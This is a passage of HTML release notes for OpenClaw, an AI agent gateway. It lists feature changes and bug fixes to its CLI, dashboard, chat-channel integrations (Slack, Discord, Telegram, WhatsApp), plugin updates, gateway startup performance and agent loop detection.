<li>Models/auth: add <code>openclaw models auth list [--provider &lt;id&gt;] [--json]</code> so users can inspect saved per-agent auth profiles without dumping secrets or hitting the old “too many arguments” path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Control UI/header: show the active agent name in dashboard breadcrumbs without adding the current session key, keeping non-chat views oriented without crowding the topbar.</li>
<li>Control UI/cron: make the New Job sidebar collapsible so the jobs list can reclaim space while keeping the form one click away. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Gateway/startup: keep model-catalog test helpers, run-session lookup code, QR pairing helpers, and TypeBox memory-tool schema construction out of hot startup import paths, reducing default gateway benchmark plugin-load and memory pressure.</li>
<li>Control UI/performance: record browser long animation frame or long task entries in the debug event log when supported, making slow dashboard renders easier to attribute from the UI.</li>
<li>Slack/streaming: add <code>streaming.progress.render: "rich"</code> for Block Kit progress drafts backed by structured progress line data.</li>
<li>Slack/streaming: keep the newest rich progress lines when Block Kit limits trim long progress drafts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels/streaming: cap progress-draft tool lines by default so edited progress boxes avoid jumpy reflow from long wrapped lines.</li>
<li>Agents/verbose: use compact explain-mode tool summaries for <code>/verbose</code> and progress drafts by default, with <code>agents.defaults.toolProgressDetail: "raw"</code> and per-agent overrides for debugging raw command/detail output.</li>
<li>Control UI/chat: add an agent-first filter to the chat session picker, keep chat controls/composer responsive across phone/tablet/desktop widths, keep desktop chat controls on one row, avoid duplicate avatar refreshes during initial chat load, and hide that row while scrolling down the transcript. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Control UI/chat: collapse consecutive duplicate text messages into one bubble with a count so no-op heartbeat acknowledgements stay compact without hiding nearby context.</li>
<li>Agents/subagents: preserve every grouped child result when direct completion fallback has to bypass the requester-agent announce turn. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>TTS/telephony: honor provider voice/model overrides in telephony synthesis providers so Google Meet agent speech logs match the backend that actually produced the audio. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Voice Call/realtime: bound the paced Twilio audio queue and close overloaded realtime streams before provider audio can pile up behind the websocket backpressure guard. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Docs: clarify that IRC uses raw TCP/TLS sockets outside operator-managed forward proxy routing, so direct IRC egress should be explicitly approved before enabling IRC. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</li>
<li>Gateway/performance: defer non-readiness sidecars until after the ready signal, avoid hot-path channel plugin barrel imports, and fast-path trusted bundled plugin metadata during Gateway startup.</li>
<li>Gateway/performance: avoid importing <code>jiti</code> on native-loadable plugin startup paths, so compiled bundled plugin surfaces do not pay source-transform loader cost unless fallback loading is actually needed.</li>
<li>Gateway/diagnostics: add startup phase spans, active work labels, stale terminal bridge markers, and default sync-I/O tracing in <code>pnpm gateway:watch</code> so slow Gateway turns are easier to attribute from logs and stability diagnostics.</li>
<li>Plugins/loader: preserve real compiled plugin module evaluation errors on the native fast path instead of treating every thrown <code>.js</code> module as a source-transform fallback miss. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QA/Mantis: add <code>pnpm openclaw qa mantis slack-desktop-smoke</code> to run Slack live QA inside a Crabbox VNC desktop, open Slack Web, and capture desktop screenshots beside the Slack QA artifacts.</li>
<li>QA/Mantis: pass the runtime env through desktop-browser Crabbox and artifact-copy child commands, so embedded Mantis callers can provide Crabbox credentials without mutating the parent process. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QA/Mantis: return the copied Slack desktop screenshot path even when remote Slack QA fails, so the CLI still prints the failure screenshot artifact. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QA/Mantis: accept Blacksmith Testbox <code>tbx_...</code> lease ids from desktop smoke warmup, so provider overrides do not fail before inspect/run. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QA/Codex harness: add targeted live Docker/Testbox diagnostics, auth preflight checks, cache mount fixes, and app-server protocol checkout discovery so maintainer harness failures are easier to reproduce. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/update: treat official externalized bundled npm migrations and ClawHub-to-npm fallbacks as trusted source-linked installs, so prerelease-only official plugin packages can migrate from bundled builds without being rejected as unsafe prerelease resolutions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/update: move ClawHub-preferred externalized plugin installs back to ClawHub after an earlier npm fallback once the ClawHub package becomes available. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/update: clean stale bundled load paths for already-externalized pinned npm and ClawHub plugin installs, so release-channel sync does not leave removed bundled paths ahead of the installed external package. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Telegram: accept plugin-owned numeric forum-topic targets in the agent message tool and keep reply-dispatch provider chunks behind a real stable runtime alias during in-place package updates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4374314127" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77137/hovercard" href="https://github.com/openclaw/openclaw/issues/77137">#77137</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/richardmqq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/richardmqq">@richardmqq</a>.</li>
<li>Google Meet: preserve <code>realtime.introMessage: ""</code> so realtime Chrome joins can stay silent instead of restoring the default spoken intro. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/SDK: add bounded <code>before_agent_finalize</code> retry instructions so workflow plugins can request one more model pass. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>Discord/status: add degraded Discord transport and gateway event-loop starvation signals to <code>openclaw channels status</code>, <code>openclaw status --deep</code>, and fetch-timeout logs so intermittent socket resets do not look like a healthy running channel. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370424830" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76327" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76327/hovercard" href="https://github.com/openclaw/openclaw/pull/76327">#76327</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Providers/OpenRouter: add opt-in response caching params that send OpenRouter's <code>X-OpenRouter-Cache</code>, <code>X-OpenRouter-Cache-TTL</code>, and cache-clear headers only on verified OpenRouter routes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/OpenRouter: expand app-attribution categories so OpenClaw advertises coding, programming, writing, chat, and personal-agent usage on verified OpenRouter routes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/update: make package upgrades swap pnpm/npm-prefix installs cleanly, keep legacy plugin install runtime chunks working, and on the beta channel fall back default-line npm plugins to default/latest when plugin beta releases are missing or fail install validation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Channels/WhatsApp: support explicit WhatsApp Channel/Newsletter <code>@newsletter</code> outbound message targets with channel session metadata instead of DM routing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3921599881" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/13417" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/13417/hovercard" href="https://github.com/openclaw/openclaw/issues/13417">#13417</a>; carries forward the narrow outbound target idea from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3921655588" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/13424" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/13424/hovercard" href="https://github.com/openclaw/openclaw/pull/13424">#13424</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/agentz-manfred/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/agentz-manfred">@agentz-manfred</a>.</li>
<li>Exec approvals: add a tree-sitter-backed shell command explainer for future approval and command-review surfaces. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356957695" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75004" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75004/hovercard" href="https://github.com/openclaw/openclaw/pull/75004">#75004</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</li>
<li>Agents/sandbox: store sandbox container and browser registry entries as per-runtime shard files, reducing unrelated session lock contention while <code>openclaw doctor --fix</code> migrates legacy monolithic registry files. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355267442" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74831" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74831/hovercard" href="https://github.com/openclaw/openclaw/pull/74831">#74831</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luckylhb90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luckylhb90">@luckylhb90</a>.</li>
<li>Plugins/ClawHub: annotate 429 errors from ClawHub with the reset window from <code>RateLimit-Reset</code>/<code>Retry-After</code> and append a <code>Sign in for higher rate limits.</code> hint when the request was unauthenticated, so users can see when downloads will recover and how to lift the cap. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
<li>Plugins/runtime state: add <code>registerIfAbsent</code> for atomic keyed-store dedupe claims that return whether a plugin successfully claimed a key without overwriting an existing live value. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Plugin SDK: add plugin-owned <code>SessionEntry</code> slot projection and scoped trusted-policy session extension reads. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364052304" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75609" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75609/hovercard" href="https://github.com/openclaw/openclaw/pull/75609">#75609</a>; replaces part of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341413994" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73384" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73384/hovercard" href="https://github.com/openclaw/openclaw/pull/73384">#73384</a>/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352304216" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74483" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74483/hovercard" href="https://github.com/openclaw/openclaw/pull/74483">#74483</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Infra/Windows: skip the POSIX <code>/tmp/openclaw</code> preferred path on Windows in <code>resolvePreferredOpenClawTmpDir</code> so log files, TTS temp files, and other writes land in <code>%TEMP%\openclaw-&lt;uid&gt;</code> instead of <code>C:\tmp\openclaw</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203795758" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60713" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60713/hovercard" href="https://github.com/openclaw/openclaw/issues/60713">#60713</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juan-flores077/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juan-flores077">@juan-flores077</a>.</li>
<li>Media/Windows: open saved attachment temp files read/write before fsync so Windows WebChat and <code>chat.send</code> media offloads no longer fail with EPERM during durability flush. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371379191" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76593" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76593/hovercard" href="https://github.com/openclaw/openclaw/pull/76593">#76593</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/qq230849622-a11y/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/qq230849622-a11y">@qq230849622-a11y</a>.</li>
<li>Agents/tools: honor narrow runtime tool allowlists when constructing embedded-runner tool families and bundled MCP/LSP runtimes, so cron/subagent runs that request tools such as <code>update_plan</code>, <code>browser</code>, <code>x_search</code>, channel login tools, or <code>group:plugins</code> no longer start with missing tools or unrelated bootstrap work. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4379470874" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77519" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77519/hovercard" href="https://github.com/openclaw/openclaw/issues/77519">#77519</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4379682883" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77532/hovercard" href="https://github.com/openclaw/openclaw/issues/77532">#77532</a>)</li>
<li>Codex plugin: mirror the experimental upstream app-server protocol and format generated TypeScript before drift checks, keeping OpenClaw's <code>experimentalApi</code> bridge compatible with latest Codex while preserving formatter gates.</li>
<li>Telegram/media: derive no-caption inbound media placeholders from saved MIME metadata instead of the Telegram <code>photo</code> shape, so non-image and mixed attachments no longer reach the model as <code>&lt;media:image&gt;</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304175260" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69793" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69793/hovercard" href="https://github.com/openclaw/openclaw/issues/69793">#69793</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aspalagin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aspalagin">@aspalagin</a>.</li>
<li>Agents/cache: keep per-turn runtime context out of ordinary chat system prompts while still delivering hidden current-turn context, restoring prompt-cache reuse on chat continuations. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4378353164" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77431" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77431/hovercard" href="https://github.com/openclaw/openclaw/issues/77431">#77431</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Udjin79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Udjin79">@Udjin79</a>.</li>
<li>Gateway/startup: include resolved thinking and fast-mode defaults in the <code>agent model</code> startup log line, defaulting unset startup thinking to <code>medium</code> without mixing in reasoning visibility.</li>
<li>Agents/Tools: add post-compaction loop guard in <code>pi-embedded-runner</code> that arms after auto-compaction-retry and aborts the run with <code>compaction_loop_persisted</code> when the agent emits the same <code>(tool, args, result)</code> triple <code>windowSize</code> times (default 3) within that window. Disable via existing <code>tools.loopDetection.enabled</code>; tune via <code>tools.loopDetection.postCompactionGuard.windowSize</code>. Targets the failure mode where context-overflow + compaction does not break a tool-call loop. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4378890322" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77474" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77474/hovercard" href="https://github.com/openclaw/openclaw/issues/77474">#77474</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3966514344" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/21597" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/21597/hovercard" href="https://github.com/openclaw/openclaw/issues/21597">#21597</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efpiva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efpiva">@efpiva</a>.</li>
<li>Gateway/watch: suppress sync-I/O trace output during <code>pnpm gateway:watch --benchmark</code> unless explicitly requested, so CPU profiling no longer floods the terminal with stack traces.</li>
<li>Gateway/watch: when benchmark sync-I/O tracing is explicitly enabled, tee trace blocks to the benchmark output log and filter them from the terminal pane while keeping normal Gateway logs visible.</li>
<li>Plugins/runtime-deps: include <code>json5</code> in the memory-core plugin runtime dependency set so packaged <code>memory_search</code> sandboxes can resolve generated OpenClaw runtime chunks that parse JSON5 config. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4378779937" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77461" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77461/hovercard" href="https://github.com/openclaw/openclaw/issues/77461">#77461</a>.</li>
<li>Codex harness: preserve app-server usage-limit reset details and deliver OpenClaw-owned runtime failure notices through tool-only source-reply mode, so Telegram and other chat channels tell users when Codex subscription limits or API failures block a turn instead of going silent. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4379971002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77557" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77557/hovercard" href="https://github.com/openclaw/openclaw/pull/77557">#77557</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Agents/OpenAI: default direct OpenAI Responses models to the SSE transport instead of WebSocket auto-selection, preventing pi runtime chat turns from hanging on servers where the WebSocket path stalls while the OpenAI HTTP stream works. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord/replies: treat failed final reply delivery as a failed turn instead of counting it as a delivered automatic visible reply, so guild/channel turns no longer show done when the final message was dropped. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4379472823" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77520" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77520/hovercard" href="https://github.com/openclaw/openclaw/issues/77520">#77520</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>.</li>
<li>Discord: prefer IPv4 for Discord REST and gateway WebSocket startup paths so IPv4-only networks no longer stall before Gateway READY and inbound message dispatch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4377964492" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77398" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77398/hovercard" href="https://github.com/openclaw/openclaw/issues/77398">#77398</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4379608404" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77526" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77526/hovercard" href="https://github.com/openclaw/openclaw/issues/77526">#77526</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Beandon13/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Beandon13">@Beandon13</a>.</li>
<li>Channels/plugins: key bundled package-state probes, env/config presence, and read-only command defaults by channel id instead of manifest plugin id, preserving setup and native-command detection for channel plugins whose package id differs from the channel alias. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Docker: prune package-excluded plugin dist directories from runtime images unless the build explicitly opts that plugin in, so official external plugins such as Feishu stay install-on-demand instead of shipping partial metadata without compiled runtime output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4378224775" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77424" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77424/hovercard" href="https://github.com/openclaw/openclaw/issues/77424">#77424</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Model switching: include the exact additive allowlist repair command when <code>/model ... --runtime ...</code> targets a blocked model, and make Telegram's model picker say that it changes only the session model while leaving the runtime unchanged. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Mattermost: clarify that the model picker only changes the session model and that runtime switches require <code>/oc_model &lt;provider/model&gt; --runtime &lt;runtime&gt;</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Doctor/config: keep active <code>auth.profiles</code> metadata intact when <code>doctor --fix</code> strips stale secret fields from configs, repairing legacy <code>&lt;provider&gt;:default</code> API-key profile metadata when model fallbacks or explicit <code>model@profile</code> refs still depend on it. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4377984968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77400" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77400/hovercard" href="https://github.com/openclaw/openclaw/issues/77400">#77400</a>.</li>
<li>Doctor/plugins: include <code>plugins.allow</code>-only official plugin ids in the release configured-plugin repair set, so <code>doctor --fix</code> installs official external plugins that are configured but not yet loaded instead of removing them as stale allow entries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4374471276" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77155" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77155/hovercard" href="https://github.com/openclaw/openclaw/issues/77155">#77155</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Doctor/sessions: clear auto-created stale session routing state from the sessions store when <code>doctor --fix</code> sees plugin-owned model/runtime/auth/session bindings outside the current configured route, while leaving explicit user model choices for manual review. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288418906" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68615" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68615/hovercard" href="https://github.com/openclaw/openclaw/issues/68615">#68615</a>.</li>
<li>CLI/update: disable and skip plugins that fail package-update plugin sync, so a broken npm/ClawHub/git/marketplace plugin cannot turn a successful OpenClaw package update into a failed update result. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/update: use an absolute POSIX npm script shell during package-manager updates, so restricted PATH environments can still run dependency lifecycle scripts while updating from <code>--tag main</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4379671077" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77530" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77530/hovercard" href="https://github.com/openclaw/openclaw/issues/77530">#77530</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PeterTremonti/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PeterTremonti">@PeterTremonti</a>.</li>
<li>Diagnostics: grant the internal diagnostics event bus to official installed diagnostics exporter plugins, so npm-installed <code>@openclaw/diagnostics-prometheus</code> can emit metrics without broadening the capability to arbitrary global plugins. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371535418" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76628" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76628/hovercard" href="https://github.com/openclaw/openclaw/issues/76628">#76628</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RayWoo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RayWoo">@RayWoo</a>.</li>
